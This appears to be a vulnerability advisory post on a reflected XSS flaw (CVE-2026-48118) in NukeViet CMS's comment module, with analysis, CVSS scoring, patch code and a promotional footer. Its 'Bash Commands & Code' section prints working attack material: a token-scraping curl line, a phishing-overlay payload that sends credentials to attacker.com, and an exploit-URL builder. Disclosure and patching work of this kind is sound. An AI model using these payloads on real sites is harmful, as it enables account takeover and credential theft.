Listen to this Post
How CVE-2026-48118 Works
This vulnerability is a reflected Cross-Site Scripting (XSS) flaw in the NukeViet CMS Comment module, enabled by two distinct weaknesses that chain together to allow unauthenticated remote code execution in a victim’s browser.
Weakness 1: Insecure Input Sanitization Ordering
The `status_comment` GET/POST parameter is intended to carry base64-encoded data. The application sanitizes this parameter using get_(), which applies PHP’s `strip_tags()` function. However, the filter is applied before the value is base64-decoded. Because base64-encoded strings consist only of the character set [A-Za-z0-9-_,], they pass through `strip_tags()` completely unchanged. The server then decodes the value using `nv_base64_decode()` and assigns it directly to the template variable `STATUS_COMMENT` without any escaping. The template engine renders this variable raw inside a `
Weakness 2: Static, Reusable Anti-CSRF Token
The `checkss` token, required to load the comment block, is computed using a hash of resource parameters combined with NV_CACHE_PREFIX:
checkss = md5(module + area + id + allowed + NV_CACHE_PREFIX)
`NV_CACHE_PREFIX` is a site-wide static constant, identical for every visitor and derived at install time from the site key and server name. Consequently, the token value is the same for all users viewing the same and never changes across sessions. This token is printed into the public HTML of every page containing a comment block, as a `data-checkss` attribute.
The Attack Chain
An attacker can open any with a comment block, read the `checkss` value from the HTML source, and construct a malicious URL:
https://<target>/index.php?language=vi&nv=comment&comment_load=1&module=news&area=<area>&id=<id>&allowed=<allowed>&checkss=<value_from_step_1>&status_comment=<base64_payload>
When the victim opens this URL, the decoded payload renders within the site’s origin, with full access to cookies, session storage, and the ability to make authenticated requests. A credential-phishing overlay was confirmed to transmit captured plaintext credentials to an attacker-controlled server. No authentication is required at any step.
NukeViet’s Content-Security-Policy includes `script-src ‘unsafe-inline’` and does not restrict navigation, so the policy does not prevent exploitation.
DailyCVE Form:
Platform: NukeViet CMS
Version: < 4.5.09
Vulnerability: Reflected XSS
Severity: High (8.2 CVSS)
date: 2026-07-13
Prediction: 2026-07-20 (v4.6.00)
What Undercode Say:
Analytics:
- Attack Vector: Network, exploitable remotely via crafted URL
- Attack Complexity: Low — `checkss` readable from public HTML; no special setup required
- Privileges Required: None — unauthenticated exploitation
- User Interaction: Required — victim must click the crafted URL
- Scope: Changed — JavaScript executes in victim’s browser, crossing the application security boundary
- Confidentiality Impact: High — full plaintext credential capture demonstrated
- Integrity Impact: Low — DOM manipulation and authenticated requests possible
- Availability Impact: None
Bash Commands & Code:
Retrieve the reusable `checkss` token from a target page:
curl -s https://<target>/index.php?nv=news&id=1 | grep -oP 'data-checkss="\K[^"]+' | head -1
Generate a base64-encoded XSS payload (credential phishing overlay):
echo '
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;"><form action="https://attacker.com/steal" method="POST"><input type="text" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" value="Login"></form></div>
<script>document.querySelector("form").submit=function(e){e.preventDefault();fetch("https://attacker.com/steal",{method:"POST",body:new FormData(this)});};</script>' | base64 -w 0
Craft the full exploit URL:
TOKEN=$(curl -s https://<target>/index.php?nv=news&id=1 | grep -oP 'data-checkss="\K[^"]+' | head -1)
PAYLOAD=$(echo '<script>alert("XSS")</script>' | base64 -w 0)
echo "https://<target>/index.php?language=vi&nv=comment&comment_load=1&module=news&area=0&id=1&allowed=0&checkss=${TOKEN}&status_comment=${PAYLOAD}"
Exploit:
The exploit requires no authentication. An attacker simply:
1. Visits any public with comments enabled.
- Copies the `data-checkss` value from the HTML source.
3. Base64-encodes a malicious HTML/JavaScript payload.
- Delivers the crafted URL to the victim via email, social media, or a third-party site.
When the victim clicks the link, the payload executes in their browser within the trusted NukeViet origin, allowing:
– Session cookie theft
– Credential harvesting via phishing overlays
– Authenticated requests performed on behalf of the victim
– Defacement or further redirection
Protection:
Patch to NukeViet 4.6.00 or later. If immediate patching is not possible, apply the following fixes:
Fix 1 — Bind `checkss` to user session:
Replace `NV_CACHE_PREFIX` with `NV_CHECK_SESSION` in all locations that generate or validate the comment `checkss` token — both inside the comment module itself and in any caller module that constructs the token before invoking the comment system:
// Before (vulnerable) $checkss = md5($module . $area . $id . $allowed . NV_CACHE_PREFIX); // After (fixed) $checkss = md5($module . $area . $id . $allowed . NV_CHECK_SESSION);
Fix 2 — Escape decoded output before rendering:
Apply `nv_htmlspecialchars()` to the result of `nv_base64_decode($status_comment)` before assigning it to the template:
// Before (vulnerable) $STATUS_COMMENT = nv_base64_decode($status_comment); // After (fixed) $STATUS_COMMENT = nv_htmlspecialchars(nv_base64_decode($status_comment));
Fix 1 alone eliminates the exploitability of this specific vector. Fix 2 is a necessary defence-in-depth layer that closes the underlying sink.
Impact:
- Confidentiality: High — attacker can capture plaintext credentials, session cookies, and sensitive data displayed within the page.
- Integrity: Low — attacker can modify the DOM, submit authenticated requests (e.g., change user profile, post comments as the victim), and redirect users.
- Availability: None — no direct denial-of-service impact.
- Business Impact: Complete compromise of any user account that clicks the malicious link, including administrative accounts, leading to full site takeover, data breach, and reputational damage.
CVSS 3.1 Vector: `AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N` — Base Score: 8.2 (High)
CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-565 (Reliance on Cookies without Validation and Integrity Checking).
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

